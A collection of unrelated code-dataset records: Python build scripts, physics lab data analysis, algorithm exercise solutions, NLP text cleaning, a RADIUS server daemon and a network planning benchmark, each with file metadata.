__init__(self, user=False):\n self.user = user\n\n def __str__(self):\n import pybind11\n return pybind11.get_include(self.user)\n\n\ndef get_jpp_include():\n return os.path.join(os.getenv(\"JPP_DIR\", \"\"), \"software\")\n\n\next_modules = [\n Extension(\n 'jppy.{}'.format(module),\n ['src/{}.cc'.format(module)],\n include_dirs=[\n get_pybind_include(),\n get_pybind_include(user=True),\n get_jpp_include()\n ],\n language='c++') for module in ['pdf', 'npe']\n]\n\n# Populating the __init__.py with submodule imports, so that one can import\n# the package and use the submodules directly with the dot-sytax.\nwith open(\"jppy/__init__.py\", \"w\") as fobj:\n fobj.write(\"\"\"from pkg_resources import get_distribution, DistributionNotFound\ntry:\n version = get_distribution(__name__).version\nexcept DistributionNotFound:\n version = \"unknown version\"\n\"\"\")\n for module in ext_modules:\n fobj.write(\"from . import {}\\n\".format(module.name.split('.')[1]))\n \n\n# As of Python 3.6, CCompiler has a `has_flag` method.\n# cf http://bugs.python.org/issue26689\ndef has_flag(compiler, flagname):\n \"\"\"Return a boolean indicating whether a flag name is supported on\n the specified compiler.\n \"\"\"\n import tempfile\n with tempfile.NamedTemporaryFile('w', suffix='.cpp') as f:\n f.write('int main (int argc, char **argv) { return 0; }')\n try:\n compiler.compile([f.name], extra_postargs=[flagname])\n except setuptools.distutils.errors.CompileError:\n return False\n return True\n\n\ndef cpp_flag(compiler):\n \"\"\"Return the -std=c++[11/14/17] compiler flag.\n\n The newer version is prefered over c++11 (when it is available).\n \"\"\"\n flags = ['-std=c++14', '-std=c++11']\n\n for flag in flags:\n if has_flag(compiler, flag): return flag\n\n raise RuntimeError('Unsupported compiler -- at least C++11 support '\n 'is needed!')\n\n\nclass BuildExt(build_ext):\n \"\"\"A custom build extension for adding compiler-specific options.\"\"\"\n c_opts = {\n 'msvc': ['/EHsc'],\n 'unix': [],\n }\n l_opts = {\n 'msvc': [],\n 'unix': [],\n }\n\n if sys.platform == 'darwin':\n darwin_opts = ['-stdlib=libc++', '-mmacosx-version-min=10.7']\n c_opts['unix'] += darwin_opts\n l_opts['unix'] += darwin_opts\n\n def build_extensions(self):\n ct = self.compiler.compiler_type\n opts = self.c_opts.get(ct, [])\n link_opts = self.l_opts.get(ct, [])\n if ct == 'unix':\n opts.append('-DVERSION_INFO=\"%s\"' %\n self.distribution.get_version())\n opts.append(cpp_flag(self.compiler))\n if has_flag(self.compiler, '-fvisibility=hidden'):\n opts.append('-fvisibility=hidden')\n elif ct == 'msvc':\n opts.append('/DVERSION_INFO=\\\\\"%s\\\\\"' %\n self.distribution.get_version())\n for ext in self.extensions:\n ext.extra_compile_args = opts\n ext.extra_link_args = link_opts\n build_ext.build_extensions(self)\n\n\nsetup(\n name='jppy',\n author='Tamas Gal',\n author_email='tgal@km3net.de',\n url='https://git.km3net.de/km3py/jppy',\n description='Jpp Python Package',\n packages=[\"jppy\"],\n long_description=\"jppy - Jpp Python Package\",\n ext_modules=ext_modules,\n install_requires=['pybind11>=2.4'],\n setup_requires=['pybind11>=2.4', 'setuptools_scm'],\n use_scm_version=True,\n cmdclass={'build_ext': BuildExt},\n zip_safe=False,\n)\n","sub_path":"pypi_install_script/jppy-3.3.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"592859156","text":"#! /usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved\n\n# type: ignore\n\n\"\"\"\nWrite simple configs to the HMA config database\n\"\"\"\n\nimport argparse\nfrom dataclasses import fields\nimport getpass\nimport json\nimport tempfile\nimport subprocess\nimport typing as t\nimport re\n\nfrom hmalib.lambdas.fetcher import ThreatExchangeConfig\nfrom hmalib.common import config as hmaconfig\n\nSUPPORTED_CONFIGS = [\n ThreatExchangeConfig,\n]\n\n\ndef better_bool_type(s: str):\n s = s.strip().lower()\n if s in (\"true\", \"1\"):\n return True\n if s in (\"false\", \"0\"):\n return False\n\n raise argparse.ArgumentTypeError(\"for bools use 'true' or 'false'\")\n\n\ndef get_configs(args):\n config_cls = {config_cls.__name__: config_cls for config_cls in SUPPORTED_CONFIGS}[\n args.config_type\n ]\n if args.name:\n print(config_cls.getx(args.name))\n return\n for config in config_cls.get_all():\n print(config)\n\n\ndef edit_config(args):\n \"\"\"Update a config of the chosen type\"\"\"\n kwargs = {}\n for field in fields(args.config_cls):\n kwargs[field.name] = getattr(args, field.name)\n config = args.config_cls(**kwargs)\n hmaconfig.update_config(config)\n print(config)\n\n\ndef load_defaults(_args):\n \"\"\"\n Load a hardcoded set of defaults which are useful in testing\n \"\"\"\n\n # Could also put the default on the class, but seems too fancy\n configs = [\n ThreatExchangeConfig(\n \"Test Config 1\",\n enabled=False,\n privacy_group=303636684709969,\n ),\n ThreatExchangeConfig(\n \"Test Config 2\",\n enabled=False,\n privacy_group=258601789084078,\n ),\n ]\n for config in configs:\n # Someday maybe can do filtering or something, I dunno\n hmaconfig.update_config(config)\n print(config)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\n \"--table\",\n default=f\"{getpass.getuser()}-HMAConfig\",\n help=\"The name of the config dynamodb table\",\n )\n subparsers = parser.add_subparsers()\n # Update\n update = subparsers.add_parser(\"update\", help=\"Add or edit a config\")\n update_subparsers = update.add_subparsers()\n for config_cls in SUPPORTED_CONFIGS:\n sub = update_subparsers.add_parser(\n config_cls.__name__, help=\"Update a config of this type\"\n )\n sub.set_defaults(config_cls=config_cls, fn=edit_config)\n for field in fields(config_cls):\n origin = t.get_origin(field.type)\n parse_type = str\n addtl_kwargs = {}\n if field.type in (str, float, int):\n parse_type = field.type\n elif field.type is bool:\n parse_type = better_bool_type\n elif field.type in (t.Set[str], t.List[str]):\n parse_type = lambda x: set(x.split(\",\"))\n else:\n raise Exception(f\"Unsupported type in config: {field.type}\")\n arg = field.name\n if arg != \"name\":\n arg = f\"--{arg}\"\n addtl_kwargs[\"required\"] = True\n sub.add_argument(\n arg,\n type=parse_type,\n metavar=re.sub(\n r\"^typing.\",\n \"\",\n re.sub(r\"\", r\"\\1\", str(field.type)),\n ),\n help=f\"{field.name}\",\n **addtl_kwargs,\n )\n # load_examples\n ex_subparser = subparsers.add_parser(\n \"load_example_configs\", help=\"Populate db with a default set of configs\"\n )\n ex_subparser.set_defaults(fn=load_defaults)\n # get\n get_config_parser = subparsers.add_parser(\"get\", help=\"get configs\")\n get_config_parser.add_argument(\n \"config_type\",\n choices=[config_cls.__name__ for config_cls in SUPPORTED_CONFIGS],\n help=\"which config type to get\",\n )\n get_config_parser.add_argument(\"--name\", help=\"the name of the config\")\n get_config_parser.set_defaults(fn=get_configs)\n\n args = parser.parse_args()\n hmaconfig.HMAConfig.initialize(args.table)\n args.fn(args)\n","sub_path":"hasher-matcher-actioner/hmalib/scripts/populate_config_db.py","file_name":"populate_config_db.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362817165","text":"import numpy as np\nimport uncertainties.unumpy as unp\nfrom uncertainties import ufloat\nimport matplotlib.pyplot as plt\nfrom scipy.stats import linregress\nfrom scipy.optimize import curve_fit\n\n#Elastizitätsmodul des rechteckigen Stabes--------------------------------------\nAbstand, Auslenkung_vor, Auslenkung_nach = np.genfromtxt('Rohdaten/Messung1.txt', unpack=True)\nAuslenkung = Auslenkung_nach - Auslenkung_vor\nAuslenkung -= 0.001\nAuslenkung *= 1e-3 #mm in m\nAbstand *= 1e-2 #cm in m\n\nprint( Auslenkung)\n#Berechnung von F\nl, L, d, M_S, M_G = np.genfromtxt('Rohdaten/Stab1.txt', unpack=True)\nd /= 1000 #mm in m\nL /= 100 #cm in m\nM_G *= 1e-3 #g in kg\nF = 9.81 * M_G\nLx2 = L*Abstand**2 - (Abstand**3)/3\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx2, Auslenkung)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot\nx_plot = np.linspace(0, 0.1)\nplt.plot(Lx2, Auslenkung, 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'Lx$^2 -\\frac{\\mathrm{x}^3}{3}$ /$m^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot1.pdf')\nplt.clf()\nprint(\"Steigung\", params[0], \" +/- \", errors[0])\nm = ufloat(params[0], errors[0])\n\n#Berechnung von I\nI = (d**4) / 6\nprint(\"Flächenträgheitsmoment des rechteckigen Stabes: \", np.mean(I) ,'+/-', np.mean(errors))\n\n#Berechnung von E\nE = F / (2 * (-m) * I)\nprint(\"Elastizitätsmodul des rechteckigen Stabes: \", np.mean(E) ,'+/-', np.mean(errors))\n\n\n#Elastizitätsmodul des runden Stabes--------------------------------------------\nAbstand, Auslenkung_vor, Auslenkung_nach = np.genfromtxt('Rohdaten/Messung2.txt', unpack=True)\nAuslenkung = Auslenkung_nach - Auslenkung_vor\nAuslenkung *= 1e-3 #mm in m\nAbstand *= 1e-2 #cm in m\nprint( Auslenkung)\n\n#Berechnung von F\nl, L, d, M_S, M_G = np.genfromtxt('Rohdaten/Stab2.txt', unpack=True)\nM_G *= 1e-3\nF = 9.81 * M_G\nL *= 1e-2 #cm in m\nd *= 1e-3 #mm in m\nLx2 = L*Abstand**2 - (Abstand**3)/3\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx2, Auslenkung)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot\nx_plot = np.linspace(0, 0.083)\nplt.plot(Lx2 , Auslenkung , 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'Lx$^2 -\\frac{\\mathrm{x}^3}{3}$ /$\\mathrm{m}^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot2.pdf')\nplt.clf()\n\nprint(\"Steigung\", params[0], \" +/- \", errors[0])\n\nm = ufloat(params[0], errors[0])\n\n#Berechnung von I\nI = np.pi / 2 * d**4\nprint(\"Flächenträgheitsmoment des runden Stabes: \", np.mean(I) ,'+/-', np.mean(errors))\n\n#Berechnung von E\nE = F / (2 * (-m) * I)\nprint(\"Elastizitätsmodul des runden Stabes: \", np.mean(E) ,'+/-', np.mean(errors))\n\n\n#Zweiseitige Durchbiegung des runden Stabes-------------------------------------\nAbstand_L, Abstand_R, Auslenkung_vor_L, Auslenkung_vor_R, Auslenkung_nach_L, Auslenkung_nach_R = np.genfromtxt('Rohdaten/Messung3.txt', unpack=True)\nAuslenkung_L = Auslenkung_nach_L - Auslenkung_vor_L\nAuslenkung_R = Auslenkung_nach_R - Auslenkung_vor_R\nAuslenkung_R *= 1e-3\nAuslenkung_L *= 1e-3\nAbstand_L *= 1e-2\nAbstand_R *= 1e-2\nprint( Auslenkung_R)\nprint( Auslenkung_L)\n#Berechnung von F\nl, L, d, M_S, M_G = np.genfromtxt('Rohdaten/Stab3.txt', unpack=True)\nM_G *= 1e-3\nF = 9.81 * M_G\nL *= 1e-2 #cm in m\nd *= 1e-3 #mm in m\nLx_L = 4*Abstand_L**3 -12*L*Abstand_L**2 + 9*L*Abstand_L - L**3\nLx_R = 3*L**2*Abstand_R - 4*Abstand_R**3\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx_L, Auslenkung_L)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot links\nx_plot = np.linspace(0.86, 1.24)\nplt.plot(Lx_L, Auslenkung_L, 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'(4x$^3$ - 12Lx$^2$ + 9L^$2$x - L$^3$) /$m^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot3_1.pdf')\nplt.clf()\n\nprint('Steigung', params[0], \" +/- \", errors[0])\n\nm = ufloat(params[0], errors[0])\n\n#Berechnung von I\nI = np.pi / 4 * d**4\nprint('flächenträgheitsmoment des 3.Stabes', np.mean(I) ,'+/-', np.mean(errors))\n\n#Berechnung von E\nE = F / (48 * m * I)\nprint('Elastizitätmodul des Stabes von links', E ,'+/-', np.mean(errors))\n\n#Fit\ndef f(x, m, b):\n return m*x + b\n\nparams, cov = curve_fit(f, Lx_R, Auslenkung_R)\nerrors = np.sqrt(np.diag(cov))\n\n#Plot rechts\nx_plot = np.linspace(0.03, 0.16)\nplt.plot(Lx_R, Auslenkung_R, 'rx', label='Messdaten')\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit')\nplt.xlabel(r'(3L$^2$x - 4x$^3$) /$m^3$')\nplt.ylabel(r'D(x) /m')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.savefig('build/plot3_2.pdf')\nplt.clf()\n\nprint('Steigung', params[0], \" +/- \", errors[0])\n\nm = ufloat(params[0], errors[0])\n\n#Berechnung von E\nE = F / (48 * m * I)\nprint('Elastizitätmodul des Stabes von links', E ,'+/-', np.mean(errors))\n","sub_path":"v103/rechnungen.py","file_name":"rechnungen.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558461816","text":"from typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def binaryTreePaths(self, root: TreeNode) -> List[str]:\n str_path_list = []\n\n self.dfs(root, \"\", str_path_list)\n\n return str_path_list\n\n def dfs(self, root: TreeNode, str_path, path_list):\n if root is None:\n return\n\n if str_path == \"\":\n str_path += f\"{root.val}\"\n else:\n str_path += f\"->{root.val}\"\n\n if root.left is None and root.right is None:\n path_list.append(str_path)\n\n if root.left is not None:\n self.dfs(root.left, str_path, path_list)\n if root.right is not None:\n self.dfs(root.right, str_path, path_list)\n","sub_path":"Easy/257.py","file_name":"257.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462499238","text":"from collections import Counter\n\n# input_lines = '''\\\n# eedadn\n# drvtee\n# eandsr\n# raavrd\n# atevrs\n# tsrnev\n# sdttsa\n# rasrtv\n# nssdts\n# ntnada\n# svetve\n# tesnvt\n# vntsnd\n# vrdear\n# dvrsen\n# enarar'''.splitlines()\n\ninput_lines = open('input.txt')\n\ncounters = []\nfor line in input_lines:\n for i, char in enumerate(line):\n if i >= len(counters):\n counters.append(Counter())\n counters[i].update([char])\n\nprint(''.join(c.most_common(1)[0][0] for c in counters))","sub_path":"2016/day6/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"628370252","text":"def find_min(left, right, m, log):\n length = right - left + 1\n k = log[length]\n return min(m[left][k], m[right-(1< 0):\n if(possible_sentiment.iloc[0]['priorpolarity'] == 'negative'):\n return 'negative'\n elif(possible_sentiment.iloc[0]['priorpolarity'] == 'positive'):\n return 'positive'\n else:\n return 'neutral'\n return 'neutral'\n\ndef get_lemma(meta_dict, tag):\n if tag[0] in meta_dict[\"stop_words_en\"]:\n lemma = tag[0]\n else:\n lemma = meta_dict[\"lemmatizer\"].lemmatize(tag[0], get_wordnet_pos(tag[1]))\n return (lemma, tag[1], get_sentiment(meta_dict, tag[0], get_sentiment_pos(tag[1])))\n\ndef clean_sentence(meta_dict, sentence):\n\ttext = sentence\n\t# get text and remove the artificial newlines and numbers\n\t#text = re.sub(\"0|1|2|3|4|5|6|7|8|9\", \"\", sentence.replace('\\\\n',' '))\n\t# spell correct the text and make unicode consistent\n\ttext = unidecode(language_check.correct(text, meta_dict[\"language_check_tool\"].check(text)).lower())\n\t# remove all punctuation\n\t#text = text.translate(str.maketrans('','',string.punctuation))\n\t# get treebank tokens\n\ttokens = word_tokenize(text)\n\t# get part of speech tags\n\ttags = nltk.pos_tag(tokens)\n\t# get lemmas and sentiment for tokens\n\tlemmas = [get_lemma(meta_dict, tag) for tag in tags]\n\tif len(lemmas) >= 3 and np.sum(np.array([x[0] for x in lemmas[-3:]]) == np.array(['make', 'on', 'imgur'])) >= 2:\n\t\tlemmas = lemmas[:-3]\n\treturn lemmas","sub_path":"cleaning/cleaning_functions.py","file_name":"cleaning_functions.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221753954","text":"#!/usr/bin/env python\n\n\"\"\"\nRead showers from CORSIKA files and write to I3 files\n\"\"\"\n\nfrom os.path import expandvars\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=__doc__)\nparser.add_argument('-i', '--infile', nargs='*', help=\"Input CORSIKA files\",\n default=[expandvars('$I3_TESTDATA/DAT010000')])\nparser.add_argument('-o', '--outfile', help=\"Output I3 file\",\n default=\"DAT010000.i3.bz2\")\nparser.add_argument('-g', '--gcdfile', default=\"\", help=\"GCD file to prepend\")\nparser.add_argument('-n', '--nevents', default=1, type=int, help=\"Number of simulated events per file\")\nopts = parser.parse_args()\n\nfrom icecube import icetray, dataclasses, dataio, phys_services, corsika_reader\nfrom I3Tray import I3Tray\n\ntray = I3Tray()\n\ntray.context['I3FileStager'] = dataio.get_stagers()\ntray.context['I3RandomService'] = phys_services.I3GSLRandomService(42)\ntray.AddModule('I3CORSIKAReader',\n FilenameList = opts.infile,\n Prefix = opts.gcdfile,\n NEvents = opts.nevents)\n\ntray.Add(\"I3Writer\", Streams=map(icetray.I3Frame.Stream, 'QP'),\n filename=opts.outfile)\n\ntray.Execute()\n","sub_path":"corsika-reader/resources/examples/corsika2i3.py","file_name":"corsika2i3.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14249543","text":"from typing import List\n\n\nclass Node(object):\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\nclass Solution:\n is_true = True\n\n def canFinish(self, class_num: int, pre_class: List[List[int]]) -> bool:\n ingress = [[0 for i in range(class_num)] for i in range(class_num)]\n one_cnt = 0\n\n for pair in pre_class:\n cur, pre = pair[0], pair[1]\n ingress[pre][cur] += 1\n one_cnt +=1\n\n queue = []\n # 将入度为0的节点放入队列\n for i in range(class_num):\n ingress_sum = sum([val[i] for val in ingress]) # 获取某一列元素\n j = 0\n if ingress_sum == 0:\n queue.append(i)\n\n i = class_num\n while len(queue)>0:\n class_order = queue.pop()\n\n for k in range(class_num):\n if ingress[class_order][k] > 0:\n ingress[class_order][k] -= 1\n one_cnt -=1\n # 获取列元素\n ingress_col = [val[k] for val in ingress]\n # 获取行元素\n ingress_row = ingress[k]\n if sum(ingress_col) == 0 and sum(ingress_row) > 0:\n queue.append(k)\n\n if one_cnt == 0:\n return True\n return False\n\nif __name__ == '__main__':\n so = Solution()\n num = 2\n pre = [[1, 0], [0, 1]]\n num = 2\n pre = [[1, 0]]\n # num = 3\n # pre = [[1, 0], [1, 2], [0, 1]]\n # num = 3\n # pre = [[1, 0], [2, 1]]\n res = so.canFinish(num, pre)\n print(res)\n","sub_path":"leetcode_3/class_table.py","file_name":"class_table.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"24557223","text":"#!/usr/local/bin/python\n\"\"\"\nVoIP Radius\nData Tech Labs radius server.\nMade specially for VoIP needs.\n\"\"\"\n\n# HeadURL\t\t$HeadURL: file:///Z:/backup/svn/bsdradius/tags/release20050113_v_0_1_0/bsdradiusd.py $\n# Author:\t\t$Author: valts $\n# File version:\t$Revision: 124 $\n# Last changes:\t$Date: 2006-01-13 19:50:15 +0200 (Pk, 13 Jan 2006) $\n\n__version__ = 'BSD Radius 1.0.0'\n\n\n# import modules\nimport sys, signal\nimport os\nimport time\n\nsys.path.insert(0, './lib')\nsys.path.insert(0, './modules')\nimport BsdRadiusServer\nimport logging\nimport DatabaseConnection\nimport misc\nimport modules\nimport Config\nfrom pyrad import dictionary\nfrom ConfigDb import ConfigDb\nfrom ConfigCli import ConfigCli\nfrom configDefaults import defaultOptions, defaultTypes\nfrom logging import *\n\n\n# make sure that keyboard interrupt stops our server\n# and clean up before exiting\nsignal.signal(signal.SIGINT, misc.killSignalHandler)\nsignal.signal(signal.SIGTERM, misc.killSignalHandler)\n\n# parse command line options\nconfCli = ConfigCli(__version__)\n\n# set logging attributes\nif 'SERVER' in confCli:\n\tsrvConf = confCli['SERVER']\n\tif 'debug_mode' in srvConf and srvConf['debug_mode']:\n\t\tconfCli['SERVER']['foreground'] = True\n\t\tconfCli['SERVER']['no_threads'] = True\n\t\tconfCli['SERVER']['log_to_screen'] = True\n\tif 'log_to_screen' in srvConf and srvConf['log_to_screen']:\n\t\t# enable logging to screen \n\t\tlogging.logToScreen = True\n\tif 'log_client' in srvConf and srvConf['log_client']:\n\t\t# restrict all threads from logging\n\t\tinfo ('--- Enabling threads logging restrictions ---')\n\t\tlogging.restrictThreads = True\n\t\t# add this (main) thread to unrestricted threads to allow print log messages\n\t\tmisc.addUnrestrictedThread()\n\ninfo ('--- Reading configuration ---')\n# get config file path\nif 'PATHS' in confCli and 'config_file' in confCli['PATHS']:\n\tConfig.configFiles[0] = confCli['PATHS']['config_file']\n# read config file\nConfig.readFiles = Config.main_config.read(Config.configFiles)\n# check if all neccessary files are read\nif Config.configFiles != Config.readFiles:\n\tmisc.quit(\"Can not read required configuration files\", 1)\n\n# overwrite configfile attributes with command line ones\nconfCli.applyOptions()\n\n# print config\nmain_config = Config.main_config\ndebug (main_config)\n\n# fork and run as daemon\nif not main_config['SERVER']['foreground']:\n\tinfo ('Daemonizing...')\n\tchildProcId = os.fork()\n\tif childProcId != 0:\n\t\tsys.exit(0)\n\n# store pid in file\nuser = main_config['SERVER']['user']\ngroup = main_config['SERVER']['group']\nrunDirPath = main_config['PATHS']['run_dir']\nif not misc.checkDir(runDirPath, user = user, group = group):\n\tmisc.quit(\"Checking %s directory failed\" % runDirPath, 1)\nmisc.makePidfile()\n\n# open log file\nif main_config['PATHS']['server_log_file'] and main_config['SERVER']['log_to_file']:\n\tlogDirPath = main_config['PATHS']['log_dir']\n\tlogFilePath = main_config['PATHS']['server_log_file']\n\tinfo ('--- Opening log file ---')\n\t# check and/or create log directory\n\tif not misc.checkDir(logDirPath, user = user, group = group):\n\t\tmisc.quit(\"Checking %s directory failed\" % logDirPath, 1)\n\t# open file\n\ttry:\n\t\tlogging.logFile = open(logFilePath, 'a+')\n\t\tmisc.setOwner(logFilePath, user, group)\n\texcept:\n\t\tmisc.printExceptionError()\n\t\tquit('Can not open logfile')\n\n# parse dictionaries\ninfo ('--- Parsing dictionary files ---')\ndict = dictionary.Dictionary('dictionaries/dictionary')\n\n# connect to database\nif main_config['DATABASE']['enable']:\n\tinfo ('--- Connecting to database ---')\n\t# set driver name\n\tif main_config['DATABASE']['type'] == 'postgresql':\n\t\tDatabaseConnection.dbadapterName = 'psycopg'\n\telse:\n\t\tDatabaseConnection.dbadapterName = 'MySQLdb'\n\t\t\n\t# connect to host and store connection globally available\n\ttry:\n\t\tDatabaseConnection.dbh1 = DatabaseConnection.DatabaseConnection('dbh1')\n\t\tDatabaseConnection.dbh1.connect (\n\t\t\thost = main_config['DATABASE']['host'],\n\t\t\tuser = main_config['DATABASE']['user'],\n\t\t\tpassword = main_config['DATABASE']['pass'],\n\t\t\tdbname = main_config['DATABASE']['name'] )\n\texcept:\n\t\tmisc.printExceptionError()\n\t\tmisc.quit(\"Error connecting to database. Check DATABASE section in config file.\", 1)\n\n# start server itself\nauthport = main_config[\"SERVER\"][\"auth_port\"]\nacctport = main_config[\"SERVER\"][\"acct_port\"]\nsrv = BsdRadiusServer.BsdRadiusServer(dict = dict, authport = authport, \\\n\tacctport = acctport)\n\n# add valid server client hosts from file\nif main_config['PATHS']['clients_file']:\n\tinfo ('--- Reading server clients from file ---')\n\tclientsConf = Config.Config()\n\tclientsConf.read([main_config['PATHS']['clients_file']])\n\tsrv.addClientHosts(clientsConf)\n# add valid server client hosts from DB\n# overwrite hosts from file\nif main_config['DATABASE']['enable']:\n\tinfo ('--- Reading server clients from DB ---')\n\tconfDb = ConfigDb(DatabaseConnection.dbh1)\n\tconfDb.ReadClients()\n\tsrv.addClientHosts(confDb['CLIENTS'])\n\t\t\t\ndebug ('--- Clients: ---')\nfor addr in srv.hosts:\n\tdebug ('%s: %s' % (addr, srv.hosts[addr].name))\n\t\n# bind to IP address (default: all)\nsrv.BindToAddress(main_config['SERVER']['home'])\n\n# switch to nonprivileged user\nmisc.switchUid(user, group)\n\n# Load BSD Radius server modules.\n# Do it just before starting the server to provide modules with maximum info.\ninfo ('--- Reading module configuration ---')\nmodules.readConfig(main_config['PATHS']['modules_file'])\nmodules.readConfig(main_config['PATHS']['user_modules_file'])\ndebug ('Module configuration:')\ndebug (modules.modulesConfig)\ninfo ('--- Loading modules ---')\nmodules.loadModules()\ninfo ('--- Executing startup modules ---')\nmodules.execStartupModules()\n\n# run server\ninfo (\"--- Starting server ---\")\nsrv.Run()\n\n# do some maintenace tasks\neverythingOk = True\ndbRefreshCounter = 0\nmain_config['DATABASE']['refresh_rate'] = 10\nwhile everythingOk:\n\ttime.sleep(1)\n\t\n\t# refresh radius server clients from DB\n\tif main_config['DATABASE']['enable']:\n\t\tdbRefreshCounter += 1\n\t\tif dbRefreshCounter >= main_config['DATABASE']['refresh_rate']:\n\t\t\t#info ('Refreshing config from DB')\n\t\t\t#debug ('I was waiting for it %s seconds :)' % dbRefreshCounter)\n\t\t\tdbRefreshCounter = 0\n\t\t\tconfDb.ReadClients()\n\t\t\tsrv.addClientHosts(confDb['CLIENTS'])\n\t\t\t# print only changed clients\n\n\n# exit program\nmisc.quit()\n","sub_path":"bsdradius/tags/release20050113_v_0_1_0/bsdradiusd.py","file_name":"bsdradiusd.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615124651","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 17 07:27:22 2017\n\n@author: liyan\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom gurobipy import *\nimport networkx as nx\nfrom itertools import combinations\nimport pickle\nimport operator\n\n# Load cost matrix, then make the unit from number of spans to km\ncost_matrix = pd.read_csv('CoronetCostMatrix.csv', header=None)\ncost_matrix = cost_matrix*100\ncost_matrix[np.isinf(cost_matrix)] = 0\ncost_matrix = cost_matrix.as_matrix()\n#cost_matrix = cost_matrix.astype(int)\n\n# Define the transmission reach, the unit is km\ntr = 2000\n\nclass BenchmarkPredo(object):\n '''Solve Bathula's benchmark\n '''\n \n def __init__(self, topology_matrix, tr):\n '''\n Initialize the topology, transmission reach, and cost. Also calculate \n the shortest paths.\n '''\n self.topology_matrix = topology_matrix\n self.tr = tr\n \n # Create networkx graph object for the network topology\n self.graph = nx.to_networkx_graph(topology_matrix,\n create_using=nx.DiGraph())\n # Calculate APSP costs, and convert it to numpy matrix\n self.graph_apsp_cost = pd.DataFrame(\n nx.all_pairs_dijkstra_path_length(self.graph)).as_matrix()\n \n # Calculate all the shortest paths for all pairs in the graph\n self.graph_apsp_paths = {(i, j):\n list(nx.all_shortest_paths(self.graph, i, j))\n for i in self.graph.nodes() for j in self.graph.nodes() if i3:\n tmp_nodes.update([k[x] for x in p[1:-1]])\n# print([k[x] for x in p])\n self.candidate_RS_per_node_pair[(i, j)] = tmp_nodes\n \n self.candidate_RS_sum = sum(len(self.candidate_RS_per_node_pair[k]) \n for k in self.node_pairs)\n self.candidate_RS_per_node = {}\n self.candidate_RS_per_node_normalized = {}\n for n in self.graph.nodes():\n self.candidate_RS_per_node[n] = 0\n for i, j in self.node_pairs:\n if n in self.candidate_RS_per_node_pair[(i, j)]:\n self.candidate_RS_per_node[n] += 1\n self.candidate_RS_per_node_normalized[n] = \\\n self.candidate_RS_per_node[n]/self.candidate_RS_sum\n \n # Rank nodes according to the likelihood\n self.RS_likelihood_ranked = sorted(\n self.candidate_RS_per_node_normalized.items(), \n key=operator.itemgetter(1), reverse=True)\n \ndef save_pickle(file_name, data):\n '''File name must ends with .pkl\n '''\n with open(file_name, 'wb') as f:\n pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)\n \ndef read_pickle(file_name):\n with open(file_name, 'rb') as f:\n data = pickle.load(f)\n \n return data\n\ndef save_json(file_name, data):\n '''Save data with json\n '''\n with open(file_name, 'w') as f:\n json.dump(data, f)\n \ndef read_json(file_name):\n with open(file_name, 'r') as f:\n data = json.load(f)\n \n return data\n \n \nif __name__=='__main__':\n benchmark = BenchmarkPredo(cost_matrix, tr)\n x = pd.DataFrame(benchmark.RS_likelihood_ranked)\n x.columns = ['node', 'likelihood']\n x.to_csv('Predo_routing_and_reach.csv', index=None)","sub_path":"ext/benchmark-predo/bm1.py","file_name":"bm1.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247555747","text":"import logging\n\n\nfrom sqlalchemy import desc\nfrom sqlalchemy import asc\nfrom sqlalchemy import or_,and_\nfrom sqlalchemy.dialects import mysql\nfrom sqlalchemy.sql import text, func\n\nfrom proxyip.db.base import get_session\nfrom proxyip.db.base import get_engine\nfrom proxyip.model.ip import 